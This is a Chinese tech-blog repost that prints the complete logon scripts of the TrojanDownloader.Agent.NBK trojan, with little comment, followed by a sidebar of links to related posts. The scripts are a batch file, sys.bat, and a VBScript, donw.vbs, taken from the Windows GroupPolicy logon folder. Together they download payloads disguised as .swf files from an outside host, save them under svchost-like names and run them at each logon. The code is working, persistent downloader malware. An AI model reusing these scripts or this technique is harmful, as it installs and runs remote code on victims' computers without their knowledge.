TrojanDownloader.Agent.NBK木马脚本

最新推荐文章于 2024-08-15 10:49:39 发布
最新推荐文章于 2024-08-15 10:49:39 发布
阅读量343 收藏
点赞数
文章标签: shell
原文链接:https://yq.aliyun.com/articles/472925
版权
TrojanDownloader.Agent.NBK木马脚本
 
C:\WINDOWS\system32\GroupPolicy\User\Scripts\Logon 目录下的三个文件
donw.vbs
shijian.vbs
sys.bat
 
 
 
 
sys.bat 内容:
 
@Echo Off
Del /f /s /q /a %SystemRoot%\Web\svchst.exe
:Next 
Del /f /s /q /a %SystemRoot%\Web\svchst.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.vbs
:Next 
Del /f /s /q /a %SystemRoot%\Web\svchost.vbs
:Next 
Del /f /s /q /a %SystemRoot%\Web\svchost.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.exe
:Next
ping  www.google.com &&Goto ok    
Goto End
:ok 
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201001.swf %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201002.swf %SystemRoot%\Web\svchst.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201003.swf %SystemRoot%\Web\svchst.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201004.swf %SystemRoot%\Web\svchost.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201005.swf %SystemRoot%\Web\svchost.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201006.swf %SystemRoot%\Web\svchost.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201007.swf %SystemRoot%\Web\svchost1.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201008.swf %SystemRoot%\Web\svchost1.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchost.vbs
Exit
:End
ping  www.google.com &&Goto ok
Goto End
 
 
donw.vbs 内容:
 
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
wscript.sleep 1 
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,1
 
shijian.vbs 内容:
Dim Wsh
set ws=wscript.createobject("wscript.shell")
Wscript.Sleep 1000



本文转自jasonccier 51CTO博客,原文链接:http://blog.51cto.com/jasonccie/397041,如需转载请自行联系原作者
weixin_34318272
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Trojan-Downloader.Win32.Agent.bbb 木马手动查杀
unixtux的专栏
07-24 1041
这个木马是卡巴斯基发现的,每次开机卡巴斯基就会出现提示有木马,但是点击处理所有删除它电脑就会重启,重启完后卡巴斯基有会有相同的提示,依然重启,我实在是解决不了,通过网上才知道是这个木马,卡巴是杀不掉的,只能发现,想想发现也行,毕竟卡巴是杀毒软件,不是木马专杀,总有解决的办法,网上的说法各部相同,经我反复思考还是把它解决了。 网上说 Trojan-Downloader.Win32...
反黑精英(Anti Trojan Elite) v5.31
03-12
反黑精英的查杀速度又获大幅提升,新增分析扫描功能,可查未知木马木马、QQ盗号软件、传奇盗号软件等各种黑客程序一杀无遗,查杀全面准确,速度超快,使用简单方便,运行稳定,界面美观,可自动修复被破坏的注册表...
行为分析 恶意下载感染者 Trojan-Downloader.Win32.Agent.ahpi
weixin_33978044的博客
10-01 1086
病毒名称:BitDefender:- Kaspersky:Trojan-Downloader.Win32.Agent.ahpi NOD32v2:a variant of Win32/TrojanDownloader.Agent.UGC Rising:Trojan.Win32.Undef.dvoVT扫...
遭遇trojan-downloader.win32.agent.vjh
NONAME的专栏
07-29 1425
 今天下午开始本打算学习ARCIMS的,正是因为要学习它就装软件吧,为了节约内存我把卡巴给关掉,于是惹来了trojan-downloader.win32.agent.vjh木马,真够郁闷的。现象:一旦机器启动如果卡巴随机启动,于是卡巴会提示发现病毒并要求处理,你点击处理不一会机器就自动重启了。然而卡巴还是会报告这是什么病毒。解决:自己先是去删除windows文件下东西。根本不管用。最后上网
Trojan-Downloader.Win32.Agent.bmp分析与清除方案
congji2702的博客
06-27 768
最近写的代码出现了这样奇怪的问题,所有的htm代码全部在结尾部分加上了这一小段代码 我估计是中了病毒。随后上网一查,果然是中了病毒。 晕 ~! 开始紧张了,电脑上有许多重要的东西,赶快查找杀毒的方法。 幸好解决及时,重要文...
Unix.Trojan.DDoS_XOR-1、Linux.Trojan.Agent(Linux.BackDoor.Gates.5)木马清理
xishuang_gongzi的专栏
10-30 1万+
一、现象 Linux服务器被黑, 向外疯狂发包,造成网络瘫痪。nload显示100Mbit/s。(nload统计流量软件) 二、木马扫描 1、ClamAV介绍 ClamAV是一个在命令行下查毒软件,因为它不将杀毒作为主要功能,默认只能查出您计算机内的病毒,但是无法清除,至多删除文件。ClamAV可以工作很多的平台上,但是有少数无法支持,这就要取决您所使用的平台的流行程度了。另外它主要是来防
网络安全之变形脚本病毒的“照妖镜”--病毒反制
06-13
以SVM:TrojanDownloader/JS.Nemucod.a为例,尽管其代码形式多样,通过混淆手段批量生成,但在动态虚拟执行下,可以清晰看到它们的行为模式高度一致,无论下载链接或生成文件名如何变化,实质功能并无太大差异。...
winxp 常见病毒解释
01-23
7. **TrojanDownloader**:这类木马病毒通常伪装成合法软件,诱骗用户下载安装,然后下载并执行其他恶意代码。用户应只从可信源下载软件,并使用安全软件检查下载内容。 8. **Keylogger**:键盘记录器病毒会记录...
病毒木马查杀实战第025篇:JS下载者脚本木马的分析与防御
Gleam的专栏
03-26 1万+
前言 这次我与大家分享的是我所总结的关于JS下载者脚本木马的分析与防御技术。之所以要选择这样的一个题目,是因为在日常的病毒分析工作中,每天都会遇到这类病毒样本,少则几个,多则几十个(当然了,更多的样本已经被自动分析系统拦截下来了)。而且这类的样本甚至还有愈演愈烈之势,很可能会长盛不衰。JS脚本木马之所以会如此泛滥,与它的编写简单、易于免杀以及难以封堵等特点息息相关。而我们本次的课程也会
安卓强制恢复出厂_恢复出厂设置都没用,安卓木马病毒xHelper究竟该如何清除?...
weixin_39897687的博客
10-20 641
xHelper,一种于2019年3月被发现的木马病毒,主要被用作其他恶意软件(包括但不限于银行木马、勒索软件等)的传播工具,据说曾在不到5个月的时间里就成功感染了3.2万部智能手机和平板电脑。卡巴斯基实验室于近日发文称,即使时间已经过去了一年,但xHelper如今的活跃度完全没有减弱。另外,一旦这种木马病毒进入你的安卓设备,由它下载并安装的恶意软件就很难被清除,即使是恢复出厂设置。xHelper的...
GroupPolicy C:\WINDOWS\system32\GroupPolicy
09-29
WIN XP SP3修改组策略拒绝访问 拷贝该文件夹覆盖C:\WINDOWS\system32\GroupPolicy即可解决
VMware Workstation 15 ubuntu 18.04.3 server 随windows10自动启动和关机自动挂起
fddqfddq的专栏
11-26 346
1. 制作开启虚拟机脚本,存储路径: C:\Windows\System32\GroupPolicy\User\Scripts\Logon 脚本内容:"C:\Program Files (x86)\VMware\VMware Workstation\vmrun.exe" start "C:\D\vm\Ubuntu 64-bit.vmx" nogui 说明:虚拟机软件安装路径 start虚拟...
TrojanDownloader简单分析
Cosmopolitan的博客
07-27 2266
这里是WinMain的入口,先读取最后自己最后160解密出要下载的url: 注册服务和写入注册表来加入自启动 没有下载过就开一个线程去下载执行 下载执行并且标记为已下载 ...
解决“没有权限访问组策略”的问题
热门推荐
chenqing0927的专栏
11-05 2万+
在解决过程中,发现有很多错误都能导致没有权限访问组策路,但与此同时其他相似msc文件也是没有权限访问的,但在我的电脑上只有组策略没有权限访问,其他都能正常地访问。可见组策路无法被访问可能是gpedit.msc文件在当前用户下没有读写权限,或者是组策略访问的文件在当前用户下没有读取权限。从这个方向考虑,首先gpedit.msc本省在当前用户下具有读写权限,那么就出在读取文件权限的问题上,果真如此。在组策略运行起来之间,她要访问C:/windows/system32/GroupPolicy目录下的配置文件,可这
一个被常忽视的windows开机启动加载程序
虫子牛虻——我和我的影子
05-27 427
最近电脑老出现开机弹框,说svchost.vbs脚本错误,乍看之下应该是网页中毒之后被杀毒软件杀过,但遗留的开机启动项,由于找不到已经被杀毒软件杀掉的脚本,所以报错。       于是msconfig,regedit,windows优化大师,把开机启动自动加载的地方全都翻了一遍,但都没有可疑的程序。求助于百度,最后发现了一个文件夹:C:\WINDOWS\system32\GroupPolicy\
Windows AD域通过组策略设置域用户登录和注销脚本
kongxx的专栏
05-14 1万+
首先准备一个测试脚本 test.bat,输出当前用户名和机器名到一个文件里,内容如下 echo %COMPUTERNAME% >> c:\test\test.log echo %USERNAME% >> c:\test\test.log 运行 “gpmc.msc” 命令来启动“组策略管理编辑器”. 在“组策略管理编辑器”左侧导航树上选择 “Default Doma...
windows 自启动脚本
fengzijinliang的专栏
05-26 1万+
第一: 例如我们要开机自启动一个脚本:C:\abc\script.bat。  如果直接开机启动该脚本会弹出一个黑框,我们希望能后台执行它。  此时我们需要建一个.vbs脚本来后台执行该脚本脚本内容为:  复制代码代码如下: set ws=WScript.CreateObject("WScript.Shell")  ws.Run "C:\abc\script.bat
Shell编程
最新发布
欢迎阅读我的博客
08-15 836
shell编程
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值